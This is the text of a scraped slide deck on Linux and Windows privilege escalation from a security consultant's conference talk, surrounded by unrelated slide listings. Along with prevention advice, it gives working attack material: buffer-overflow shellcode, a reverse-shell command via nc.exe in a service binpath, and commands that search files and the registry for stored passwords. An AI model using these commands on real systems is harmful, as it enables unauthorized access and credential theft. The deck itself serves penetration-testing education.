44CON 2014 - I Hunt TR-069 Admins: Pwning ISPs Like a Boss, Shahar Tal44CON 2014 - I Hunt TR-069 Admins: Pwning ISPs Like a Boss, Shahar Tal
44CON 2014 - I Hunt TR-069 Admins: Pwning ISPs Like a Boss, Shahar Tal
 
Introduction to OWASP & Web Application Security
Introduction to OWASP & Web Application SecurityIntroduction to OWASP & Web Application Security
Introduction to OWASP & Web Application Security
 

Último

The basics of sentences session 3pptx.pptx
The basics of sentences session 3pptx.pptxThe basics of sentences session 3pptx.pptx
The basics of sentences session 3pptx.pptx
heathfieldcps1
 

Último (20)

80 ĐỀ THI THỬ TUYỂN SINH TIẾNG ANH VÀO 10 SỞ GD – ĐT THÀNH PHỐ HỒ CHÍ MINH NĂ...
80 ĐỀ THI THỬ TUYỂN SINH TIẾNG ANH VÀO 10 SỞ GD – ĐT THÀNH PHỐ HỒ CHÍ MINH NĂ...80 ĐỀ THI THỬ TUYỂN SINH TIẾNG ANH VÀO 10 SỞ GD – ĐT THÀNH PHỐ HỒ CHÍ MINH NĂ...
80 ĐỀ THI THỬ TUYỂN SINH TIẾNG ANH VÀO 10 SỞ GD – ĐT THÀNH PHỐ HỒ CHÍ MINH NĂ...
 
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdf
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdfUGC NET Paper 1 Mathematical Reasoning & Aptitude.pdf
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdf
 
Micro-Scholarship, What it is, How can it help me.pdf
Micro-Scholarship, What it is, How can it help me.pdfMicro-Scholarship, What it is, How can it help me.pdf
Micro-Scholarship, What it is, How can it help me.pdf
 
How to setup Pycharm environment for Odoo 17.pptx
How to setup Pycharm environment for Odoo 17.pptxHow to setup Pycharm environment for Odoo 17.pptx
How to setup Pycharm environment for Odoo 17.pptx
 
Unit 3 Emotional Intelligence and Spiritual Intelligence.pdf
Unit 3 Emotional Intelligence and Spiritual Intelligence.pdfUnit 3 Emotional Intelligence and Spiritual Intelligence.pdf
Unit 3 Emotional Intelligence and Spiritual Intelligence.pdf
 
Food safety_Challenges food safety laboratories_.pdf
Food safety_Challenges food safety laboratories_.pdfFood safety_Challenges food safety laboratories_.pdf
Food safety_Challenges food safety laboratories_.pdf
 
This PowerPoint helps students to consider the concept of infinity.
This PowerPoint helps students to consider the concept of infinity.This PowerPoint helps students to consider the concept of infinity.
This PowerPoint helps students to consider the concept of infinity.
 
2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx
2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx
2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx
 
The basics of sentences session 3pptx.pptx
The basics of sentences session 3pptx.pptxThe basics of sentences session 3pptx.pptx
The basics of sentences session 3pptx.pptx
 
NO1 Top Black Magic Specialist In Lahore Black magic In Pakistan Kala Ilam Ex...
NO1 Top Black Magic Specialist In Lahore Black magic In Pakistan Kala Ilam Ex...NO1 Top Black Magic Specialist In Lahore Black magic In Pakistan Kala Ilam Ex...
NO1 Top Black Magic Specialist In Lahore Black magic In Pakistan Kala Ilam Ex...
 
On_Translating_a_Tamil_Poem_by_A_K_Ramanujan.pptx
On_Translating_a_Tamil_Poem_by_A_K_Ramanujan.pptxOn_Translating_a_Tamil_Poem_by_A_K_Ramanujan.pptx
On_Translating_a_Tamil_Poem_by_A_K_Ramanujan.pptx
 
COMMUNICATING NEGATIVE NEWS - APPROACHES .pptx
COMMUNICATING NEGATIVE NEWS - APPROACHES .pptxCOMMUNICATING NEGATIVE NEWS - APPROACHES .pptx
COMMUNICATING NEGATIVE NEWS - APPROACHES .pptx
 
Application orientated numerical on hev.ppt
Application orientated numerical on hev.pptApplication orientated numerical on hev.ppt
Application orientated numerical on hev.ppt
 
On National Teacher Day, meet the 2024-25 Kenan Fellows
On National Teacher Day, meet the 2024-25 Kenan FellowsOn National Teacher Day, meet the 2024-25 Kenan Fellows
On National Teacher Day, meet the 2024-25 Kenan Fellows
 
Key note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdfKey note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdf
 
HMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptx
HMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptxHMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptx
HMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptx
 
Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024
 
Plant propagation: Sexual and Asexual propapagation.pptx
Plant propagation: Sexual and Asexual propapagation.pptxPlant propagation: Sexual and Asexual propapagation.pptx
Plant propagation: Sexual and Asexual propapagation.pptx
 
Exploring_the_Narrative_Style_of_Amitav_Ghoshs_Gun_Island.pptx
Exploring_the_Narrative_Style_of_Amitav_Ghoshs_Gun_Island.pptxExploring_the_Narrative_Style_of_Amitav_Ghoshs_Gun_Island.pptx
Exploring_the_Narrative_Style_of_Amitav_Ghoshs_Gun_Island.pptx
 
REMIFENTANIL: An Ultra short acting opioid.pptx
REMIFENTANIL: An Ultra short acting opioid.pptxREMIFENTANIL: An Ultra short acting opioid.pptx
REMIFENTANIL: An Ultra short acting opioid.pptx
 

How fun of privilege escalation Red Pill2017

  • 1. How Fun of Privilege Escalation Ammarit Thongthua, CISSP CISM GXPN Risk Advisory Manager, Deloitte Thailand
  • 2. # whoami <Name> Ammarit Thongthua Khay Shellcodenoobx </Name> <Job> Risk Advisory Manager, Deloitte Thailand Penetration Tester Security Consultant </Job> <Education> B.Eng Com, ABAC M.Sci Cyber Security and Info Assurance, Mahidol Unv. CISSP, CISM, CSSLP, GXPN, CCNP, CEH, Security+ </Education>
  • 3. Pre Exploitation Exploitation Post Exploitation # “Privilege Escalation” Information gathering Scanning Enumeration Remote Exploitation - Gain system access - Gain information - Denial of services - Privilege Escalation Local Exploitation - Bypass Restriction - Privilege Escalation Gathering Sensitive Info Manage System/Service Pivoting Windows
  • 4. # “Privilege Escalation” NT AUTHORITYSystem Administrators Power Users Users Root Sudoer UsersService Users Service Users Windows Unix
  • 5. # “Privilege Escalation” • Vertical privilege escalation -> Gain higher privilege • Horizontal privilege escalation -> Gain access with other accounts Users Service Users john Apache, mysql Users john Root
  • 6. # “Privilege Escalation” NT AUTHORITYSystem Administrators Power Users Users UsersService Users Windows Anonymous FTP Webshell LocalExploit Vul. Service Exp
  • 7. # “Privilege Escalation” NT AUTHORITYSystem Administrators Power Users UsersService Users Windows Unauthorized Access LocalExploit Users
  • 8. # “Privilege Escalation” NT AUTHORITYSystem Administrators Power Users UsersService Users Windows Unauthorized Access LocalExploit Users
  • 9. # Remote and Local Exploitation Network TCP/UDP TCP: 20/21 TCP: 22 TCP: 23 TCP: 25 UDP: 53 TCP: 80 UDP: 161 TCP: 443 TCP: 445 TCP/UDP : 514 TCP: 1433 TCP: 1521 TCP: 3306 TCP: 3389 TCP: XXXX • Remote Exploitation
  • 10. # Remote and Local Exploitation Race Condition Buffer Overflow Heap Overflow Kernel Exploit Evasion DLL Injection DLL Hijacking Hot Potato Mis-config Service, file permission
  • 11. # Remote and Local Exploitation Root
  • 12. # “Privilege Escalation” • Access to restricted resources/file • System Credential • /etc/shadow • SAM file • Registry • Configuration files • Encryption Key • System memory • Run privilege commands , set system configuration and Installations • Pivoting • Maintain access , Backdoor • Key logger, Rootkit, Dump traffic • Many more..
  • 16. # “Privilege Escalation” Ways for Linux • Remote Exploit to vulnerable service running by high privilege users • Weak password of high privilege users • Credential store in file with weak permission • Configurations, Logs files • History • Env , $PATH • Shell Escape(restrict shell ,chroot) • Vulnerable Applications / Programs / Services use high privilege users • Weak permission file of Jobs/Task run by high privilege users • Sudoer • System Misconfiguration • Kernel Exploitation • Remote Exploitation by local host
  • 17. # “Privilege Escalation” Ways for Linux • Remote Exploit to vulnerable service running by high privilege users
  • 18. # “Privilege Escalation” Ways for Linux • Remote Exploit to vulnerable service running by high privilege users FILE_SERVER #ps –ef | grep root root 1644 0.0 0.6 4504 1676 ? S 19:34 0:00 smbd -D
  • 19. # “Privilege Escalation” Ways for Linux • Weak password of high privilege users Maybe use the password similar to username Maybe use weak password root Password P@ssw0rd ….
  • 20. # “Privilege Escalation” Ways for Linux • Credential store in file with weak permission • Configurations, Logs files • History • Env , $PATH
  • 21. # “Privilege Escalation” Ways for Linux • Restricted Shell Escape https://netsec.ws/?p=337
  • 22. # “Privilege Escalation” Ways for Linux • Restricted Shell Escape https://netsec.ws/?p=337https://0feci.wordpress.com/tag/escaping-restricted-shell-bypass/
  • 23. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users • Characteristic of vulnerable program • Has permission “root” as user or group • Has set SUID, GUID • Can perform Overflow • Use Static Libc. (Nice to have)
  • 24. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users • Characteristic of vulnerable program • Has permission “root” as user or group • Has set SUID, GUID list="$(find / -perm -4000 -o -perm -2000)";for i in $list; do ls -al $i; done ls –R / | grep “wsr” | grep “root”
  • 25. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users
  • 26. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users • Characteristic of vulnerable program • Can perform Overflow
  • 27. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users Check buffer overflow position
  • 28. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users Check buffer overflow position
  • 29. #objdump –d vul_app | grep “jmp” | grep “esp” # ROPgadget --binary vul_app --only "jmp“ | grep esp 0x08049f0f : jmp %esp # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users
  • 30. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users Shellcode system(“/bin//sh”) Shellcode= “x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90 x31xC0x50x68x2Fx2Fx73x68x68x2Fx62x69x6Ex89xE3x50x53x89xE1xB0x0BxCDx80” jmp %esp 0x08049f0f esp
  • 31. #python –c ‘ “A”*612 + “x0fx49x04x08” + “x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90 x31xC0x50x68x2Fx2Fx73x68x68x2Fx62x69x6Ex89xE3x50x53x89xE1xB0x0BxCDx80”’ | ./vul_app # “Privilege Escalation” Ways for Linux Privilege is dropped
  • 32. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users #nano /tmp/sh.c
  • 33. # “Privilege Escalation” Ways for Linux #python –c ‘ “A”*612 + “x0fx49x04x08” + “x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90 x31xC0x50x68x2Fx2Fx73x68x68x2Fx74x6dx70x89xE3x50x53x89xE1xB0x0BxCDx80”’ | ./vul_app tmp • Vulnerable Applications / Programs / Services use high privilege users
  • 35. # “Privilege Escalation” Ways for Linux The real life is not easy !!!! • Canary (Buffer overflow detection) • Executable Stack Prevention (NX , DEP) • Address Space Layout Randomization (ASLR)
  • 36. # “Privilege Escalation” Ways for Linux But It’s possible to bypass !!! • Canary (Buffer overflow detection) -> Canary Repair • Executable Stack Prevention (NX , DEP) -> Ret-2-Libc , ROP • Address Space Layout Randomization (ASLR) -> Static Lib, App Warp Up https://www.slideshare.net/ammarit/unix-executable-buffer-overflow?qid=3ae3efd0-d1b4-4f3c-b85c- 82b1d063aa6b&v=&b=&from_search=1
  • 37. # “Privilege Escalation” Ways for Linux • Weak permission file of Jobs/Task run by high privilege users /etc/cron.d /etc/crontab /etc/cron.hourly /etc/cron.daily /etc/cron.weekly /etc/cron.monthly # ls -Ral /etc/cron*
  • 38. # “Privilege Escalation” Ways for Linux • Weak permission file of Jobs/Task run by high privilege users Reverse shell
  • 39. # “Privilege Escalation” Ways for Linux • Weak permission file of Jobs/Task run by high privilege users
  • 41. # “Privilege Escalation” Ways for Linux • Weak permission file of Jobs/Task run by high privilege users
  • 42. # “Privilege Escalation” Ways for Linux • Sudoer (Compromised user we got maybe in the sudoer list)
  • 43. # “Privilege Escalation” Ways for Linux • System Misconfiguration
  • 44. # “Privilege Escalation” Ways for Linux • Kernel Exploitation Ex: DirtyCOW
  • 45. # “Privilege Escalation” Ways for Linux • Kernel Exploitation (Trick) Ex: Linux version 2.6.9-89.EL • Compile exploit on the target system on target like environment • Metasploitable is good exploit compile environment
  • 46. # “Privilege Escalation” Ways for Linux #ps –ef | grep root root 1644 0.0 0.6 4504 1676 ? S 19:34 0:00 smbd -D • Remote Exploitation by local host 127.0.0.1
  • 47. # “Privilege Escalation” Ways for Linux • [Linux Privilege Escalation Scripts and Commands] Ref : https://netsec.ws/?p=309 LinEnum http://www.rebootuser.com/?p=1758 LinuxPrivChecker http://www.securitysift.com/download/linuxprivchecker.py Basic-linux-privilege-escalation https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation
  • 48. • LinuxPrivChecker # “Privilege Escalation” Ways for Linux
  • 49. • LinuxPrivChecker # “Privilege Escalation” Ways for Linux
  • 50. # “Privilege Escalation” Ways for Linux • Case Study :
  • 51. # “Privilege Escalation” Ways for Linux • Case Study :
  • 52. # “Privilege Escalation” Ways for Linux • Case Study : But no exploit detail in exploit-db !!!
  • 53. # “Privilege Escalation” Ways for Linux • Case Study :
  • 54. # “Privilege Escalation” Ways for Linux • Case Study :
  • 55. Low Priv Other Unix Servers Dirty Cow Default password Crack root pass root Bypass Restrict Shell CMC # “Privilege Escalation” Ways for Linux • Case Study :
  • 56. # “Privilege Escalation” Ways for Windows • Remote Exploit to vulnerable service running by high privilege users • Weak password of high privilege users • Credential store in file and Registry • Vulnerable Applications / Programs / Services use high privilege users • Weak permission file of Jobs/Task run by high privilege users • System Misconfiguration • Kernel Exploitation • Pass-the-hash • DLL Injection • DLL Hijacking • Remote Exploitation by local host • Hotpotato • Many more…
  • 57. # Remote Exploit to escalate privilege • Exploit to vulnerable service running with high privilege users
  • 58. # Remote Exploit to escalate privilege • Exploit to vulnerable service running with high privilege users Credit : Worawit Wangwarunyoo (sleepya)
  • 59. • Exploit to vulnerability of the service misconfigure running with high privilege users # “Privilege Escalation” Ways for Windows
  • 60. • Exploit to vulnerability of the service misconfigure running with high privilege users # “Privilege Escalation” Ways for Windows
  • 61. # Remote Exploit to escalate privilege • Exploit to vulnerability of the service misconfigure running with high privilege users WebShell
  • 62. # “Privilege Escalation” Ways for Windows • Reverse Meterpreter “getsystem” command
  • 63. # “Privilege Escalation” Ways for Windows • Reverse Meterpreter “getsystem” command “It’s not always easy in the real life”
  • 64. • PS Migration # “Privilege Escalation” Ways for Windows
  • 65. • PS Migration # “Privilege Escalation” Ways for Windows
  • 66. • PS Migration # “Privilege Escalation” Ways for Windows
  • 67. # Remote Exploit to escalate privilege • Credential store in files findstr /si password *.txt findstr /si password *.xml findstr /si password *.ini Pass PASS PWD
  • 68. c:sysprep.inf c:sysprepsysprep.xml c:unattend.xml %WINDIR%PantherUnattendUnattended.xml %WINDIR%PantherUnattended.xml dir c:*vnc.ini /s /b dir c:*ultravnc.ini /s /b dir c: /s /b | findstr /si *vnc.ini # Remote Exploit to escalate privilege • Credential store in files
  • 69. # Remote Exploit to escalate privilege https://adsecurity.org/?p=2288 (<DOMAIN>SYSVOL<DOMAIN>Policies)• Credential store in DC Policy Script files
  • 70. # Remote Exploit to escalate privilege • Credential store in registry # VNC reg query "HKCUSoftwareORLWinVNC3Password" # Windows autologin reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentversionWinlogon" # SNMP Paramters reg query "HKLMSYSTEMCurrentControlSetServicesSNMP" # Putty reg query "HKCUSoftwareSimonTathamPuTTYSessions" # Search for password in registry reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s
  • 71. # Remote Exploit to escalate privilege • Credential store in registry
  • 72. # Remote Exploit to escalate privilege
  • 73. # Remote Exploit to escalate privilege http://www.labofapenetrationtester.com/2015/05/ dumping-passwords-in-plain-on-windows-8-1.html Windows Server 2012
  • 74. # Remote Exploit to escalate privilege
  • 75. # Remote Exploit to escalate privilege • Token Impersonation https://www.offensive-security.com/metasploit-unleashed/fun-incognito/
  • 76. • Insecure Services permission # “Privilege Escalation” Ways for Windows
  • 77. • Insecure Services permission -> Modify binpath # “Privilege Escalation” Ways for Windows https://technet.microsoft.com/en-us/sysinternals/accesschk.aspx
  • 78. • Insecure Services permission -> Modify binpath # “Privilege Escalation” Ways for Windows https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
  • 79. • Insecure Services permission -> Modify binpath (Example) # “Privilege Escalation” Ways for Windows
  • 80. • Insecure Services permission -> Modify binpath (Example) # “Privilege Escalation” Ways for Windows sc config upnphost binpath= "C:Inetpubnc.exe -nv 10.11.0.110 5555 -e C:WINDOWSSystem32cmd.exe"
  • 81. • Insecure Services permission by msf # “Privilege Escalation” Ways for Windows
  • 82. # “Privilege Escalation” Ways for Windows
  • 83. # “Privilege Escalation” Ways for Windows Ref:https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ • Unquoted Service Paths When Windows attempts to run this service, it will look at the following paths in order and will run the first EXE that it will find:
  • 84. # “Privilege Escalation” Ways for Windows Ref:https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ • Unquoted Service Paths
  • 85. # “Privilege Escalation” Ways for Windows • Unquoted Service Paths
  • 86. # “Privilege Escalation” Ways for Windows • Unquoted Service Paths
  • 87. # “Privilege Escalation” Ways for Windows
  • 88. # “Privilege Escalation” Ways for Windows
  • 89. # “Privilege Escalation” Ways for Windows • Unquote path + MS15-067
  • 90. # “Privilege Escalation” Ways for Windows • Unquote path + MS15-067
  • 91. # “Privilege Escalation” Ways for Windows GGEZ • Unquote path + MS15-067
  • 92. • DLL Hijacking # “Privilege Escalation” Ways for Windows https://msitpros.com/?p=2012 The way that Windows loads DLLs then, is to search the following directories in this order: – The directory from which the application loaded – C:WindowsSystem32 – C:WindowsSystem – C:Windows – The current working directory – Directories in the system PATH environment variable – Directories in the user PATH environment variable https://www.gracefulsecurity.com/privesc-dll-hijacking/
  • 93. • DLL Hijacking # “Privilege Escalation” Ways for Windows https://pentestlab.blog/2017/03/27/dll-hijacking/
  • 94. # “Privilege Escalation” Ways for Windows • DLL Hijacking https://pentestlab.blog/2017/03/27/dll-hijacking/
  • 97. # “Privilege Escalation” Ways for Windows • Driver Exploitation
  • 98. https://www.exploit-db.com/exploits/42665/ Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation• Driver Exploitation Example : # “Privilege Escalation” Ways for Windows
  • 99. • HOT Potato # “Privilege Escalation” Ways for Windows
  • 100. • HOT Potato # “Privilege Escalation” Ways for Windows Manual add user Use Hot Potato technique
  • 101. # “Privilege Escalation” Ways for Windows • Pass-th-Hash
  • 102. • Remote Exploit on the localhost # “Privilege Escalation” Ways for Windows
  • 103. # “Privilege Escalation” Ways for Windows • Local exploit with Metasploit
  • 104. # “Privilege Escalation” Ways for Windows • Local exploit with Metasploit
  • 105. • Local Exploit to escalate privilege # “Privilege Escalation” Ways for Windows
  • 106. # “Privilege Escalation” Ways for Windows
  • 107. # “Privilege Escalation” Ways for Windows • Local Exploit to escalate privilege
  • 108. # “Privilege Escalation” Ways for Windows
  • 109. dpkg --add-architecture i386 && apt-get update && apt-get install wine32 pip install pyinstaller # “Privilege Escalation” Ways for Windows
  • 110. # “Privilege Escalation” Ways for Windows DEMO Noobx_shell
  • 111. # “Privilege Escalation” Ways for Windows
  • 112. # “Privilege Escalation” Ways for Windows
  • 113. # “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010 DC1 Servers Client PC Unpatch
  • 114. # “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010
  • 115. # “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010
  • 116. # “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010 DC1 Servers Client PC Unpatch
  • 117. # “Privilege Escalation” on other devices • Mobile Phone • Root or Jailbreak • DirtyCow • Network Device • Remote Exploit • EXTRABACON exploit • Backdooring • ROM0 • Password Crack of high privilege level account
  • 118. # “Privilege Escalation” on other devices
  • 119. # Prevention • Secure by design • System hardening • Disable unused service • Disable/remove unused programs , users or backup files • Installed endpoint security • Strong Access Control and Authentication • Least Privilege • Patch Management • Security Assessment • Vulnerability Assessment • Penetration Testing
  • 120. Q & A
  • 121.
  • 122. Thank You Ammarit Thongthua, CISSP CISM GXPN Risk Advisory Manager, Deloitte Thailand
  • 123. • http://www.fuzzysecurity.com/tutorials/16.html • https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html • https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/Privilege%20Escalation%20%26%20Post- Exploitation.md • http://www.hackingarticles.in/7-ways-get-admin-access-remote-windows-pc-bypass-privilege-escalation/ • https://pentestlab.blog/2017/04/04/dll-injection # References